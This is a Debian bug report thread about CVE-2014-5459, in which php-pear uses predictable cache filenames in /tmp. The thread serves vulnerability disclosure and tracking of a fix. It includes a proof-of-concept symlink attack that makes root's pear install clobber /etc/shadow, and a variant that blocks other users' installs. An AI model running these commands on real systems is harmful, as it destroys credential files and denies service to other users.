#759282 [php-pear] "/tmp" symlink file clobbering (CVE-2014-5459)

#759282#5
Date:
2014-08-25 19:28:44 UTC
From:
To:
Package: php-pear
Version: 5.4.4-14+deb7u14
Tags: security

PEAR commands such as "pear install [...]" writes cache data into
predictable filenames located in "/tmp/".  Unprivileged local users
could use symlinks to clobber arbitrary files.

Temporary filenames ("$cachefile" and "$cacheidfile") are generated with
the code above.  They are predictable as far as we know the extension
name that is going to be installed (this name is used to construct the
url for the MD5 checksum):

    $ cat -n /usr/share/php/PEAR/REST.php
    [...]
    59         $cachefile = $this->config->get('cache_dir') . DIRECTORY_SEPARATOR .
    60             md5($url) . 'rest.cachefile';
    [...]
    194        $cacheidfile = $this->config->get('cache_dir') . DIRECTORY_SEPARATOR .
    195            md5($url) . 'rest.cacheid';

For instance, when installing the "Mail_mime" extension, the following
filenames are used by PEAR:

  - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile
  - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cacheid

In this case, the "$url" used for md5 checksum is the following:

    $ printf "http://pear.php.net/rest/p/mail_mime/info.xml" | md5sum
    ff051dc5b96c95bf60e300d415b6c47e  -

To sum up, if a local user wants to clobber the "/etc/shadow" file, he
runs:

    $ mkdir -p /tmp/pear/cache/
    $ ln -s /etc/shadow /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile

Then when root runs PEAR, file gets clobbered:

    # pear install Mail_mime
    [...]
    # du -sk /etc/shadow
    0	/etc/shadow

A function like tempnam() could be use instead.  It creates file with
unique filename (see http://php.net/manual/en/function.tempnam.php).

Regards,

#759282#10
Date:
2014-08-26 04:50:09 UTC
From:
To:
Hello,

It was reported that the pear utility insecurely used the /tmp/
directory for cache data. A local attacker could use this flaw to
perform a symbolic link attack against a user (typically the root user)
running a pear command (such as "pear install").

Original report:

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=759282

Could a CVE please be assigned?

Thanks,

#759282#15
Date:
2014-08-26 09:20:14 UTC
From:
To:
Yes, it's a known bug that php-pear is not safe on multiuser systems.

Ondrej

#759282#24
Date:
2014-08-27 05:24:20 UTC
From:
To:
Use CVE-2014-5459.
#759282#29
Date:
2015-11-07 13:25:32 UTC
From:
To:
Version: 5.3.6-1

Hello,

According to https://pear.php.net/bugs/bug.php?id=18056, it's fixed since 1.9.2

Regards

#759282#38
Date:
2015-11-07 14:05:43 UTC
From:
To:
Hi Mathieu,

is this true? I just did a quick check (not a full analysis) and it
still seems to use /tmp/pear.

Can you check if the upstream bug report might be pointing to the
wrong fixing version?

(I have reopened the bugs for now)

Regards,
Salvatore

#759282#43
Date:
2015-11-07 14:53:07 UTC
From:
To:
2015-11-07 15:05 GMT+01:00 Salvatore Bonaccorso <carnil@debian.org>:

This even introduced a regression on Windows:
https://pear.php.net/bugs/bug.php?id=18834
https://github.com/pear/pear-core/commit/38de9355e3a9c66445a6d39d2c9a20f73e986d9a
(which is in 1.9.2)

And further improvement in:
https://github.com/pear/pear-core/commit/cd31da7d8b5e684f177a8fe700339f7eb2420876
(which is in 1.9.3)

Can we close it then?

Regards

#759282#52
Date:
2015-11-08 06:25:07 UTC
From:
To:
Hi Mathieu,
you cannot globber anymore someone else files. A can block another
user this way.

As user foo do:

foo@sid:~$ pear download HTML_Common2
downloading HTML_Common2-2.1.1.tgz ...
Starting to download HTML_Common2-2.1.1.tgz (8,604 bytes)
.....done: 8,604 bytes
File /home/foo/HTML_Common2-2.1.1.tgz downloaded


then replace the cache files with symlinks (e.g. to files in home of
user bar, since he want's to try to globber these files). bar now is
unable to pear download HTML_Common2:

bar@sid:~$ pear download HTML_Common2

Notice: unserialize(): Error at offset 0 of 220 bytes in PEAR/REST.php on line 203
PHP Notice:  unserialize(): Error at offset 0 of 220 bytes in /usr/share/php/PEAR/REST.php on line 203
No releases available for package "pear.php.net/HTML_Common2"
download failed
bar@sid:~$ ls
bar@sid:~$

or as root

root@sid:~# pear download HTML_Common2

Notice: unserialize(): Error at offset 0 of 220 bytes in PEAR/REST.php
on line 203
PHP Notice:  unserialize(): Error at offset 0 of 220 bytes in
/usr/share/php/PEAR/REST.php on line 203
No releases available for package "pear.php.net/HTML_Common2"
download failed
root@sid:~# pear install HTML_Common2

Notice: unserialize(): Error at offset 0 of 220 bytes in PEAR/REST.php
on line 203
PHP Notice:  unserialize(): Error at offset 0 of 220 bytes in
/usr/share/php/PEAR/REST.php on line 203
No releases available for package "pear.php.net/HTML_Common2"
install failed
root@sid:~#

So again, I don't think the issues with unsafe use of /tmp are fixed
correctly and the bugs should not be closed. PHP maintainers, what do
you think (Ondřej cc'ed)?

Regards,
Salvatore

#759282#55
Date:
2015-11-08 06:25:07 UTC
From:
To:
Hi Mathieu,
you cannot globber anymore someone else files. A can block another
user this way.

As user foo do:

foo@sid:~$ pear download HTML_Common2
downloading HTML_Common2-2.1.1.tgz ...
Starting to download HTML_Common2-2.1.1.tgz (8,604 bytes)
.....done: 8,604 bytes
File /home/foo/HTML_Common2-2.1.1.tgz downloaded


then replace the cache files with symlinks (e.g. to files in home of
user bar, since he want's to try to globber these files). bar now is
unable to pear download HTML_Common2:

bar@sid:~$ pear download HTML_Common2

Notice: unserialize(): Error at offset 0 of 220 bytes in PEAR/REST.php on line 203
PHP Notice:  unserialize(): Error at offset 0 of 220 bytes in /usr/share/php/PEAR/REST.php on line 203
No releases available for package "pear.php.net/HTML_Common2"
download failed
bar@sid:~$ ls
bar@sid:~$

or as root

root@sid:~# pear download HTML_Common2

Notice: unserialize(): Error at offset 0 of 220 bytes in PEAR/REST.php
on line 203
PHP Notice:  unserialize(): Error at offset 0 of 220 bytes in
/usr/share/php/PEAR/REST.php on line 203
No releases available for package "pear.php.net/HTML_Common2"
download failed
root@sid:~# pear install HTML_Common2

Notice: unserialize(): Error at offset 0 of 220 bytes in PEAR/REST.php
on line 203
PHP Notice:  unserialize(): Error at offset 0 of 220 bytes in
/usr/share/php/PEAR/REST.php on line 203
No releases available for package "pear.php.net/HTML_Common2"
install failed
root@sid:~#

So again, I don't think the issues with unsafe use of /tmp are fixed
correctly and the bugs should not be closed. PHP maintainers, what do
you think (Ondřej cc'ed)?

Regards,
Salvatore

#759282#62
Date:
2015-11-09 06:17:24 UTC
From:
To:
2015-11-08 7:25 GMT+01:00 Salvatore Bonaccorso <carnil@debian.org>:

Hi Salvatore,

I didn't want to close, it, but my Reply-to-all went to the -done addresses.

Which pear version are you testing?

Note that I'll be the php-pear maintainer, once the new package [1] is finished.

We should test against this latest 1.10 and report upstream is the bug remain.

[1]: anonscm.debian.org/cgit/pkg-php/php-pear.git

Regards

#759282#67
Date:
2015-11-14 18:18:52 UTC
From:
To:
Hi Mathieu,

Just to confirm, this was with php-pear provided from src:php5,
Version 5.6.14+dfsg-1.

Ack, yes I see.

Regards and thanks for your work there!

Salvatore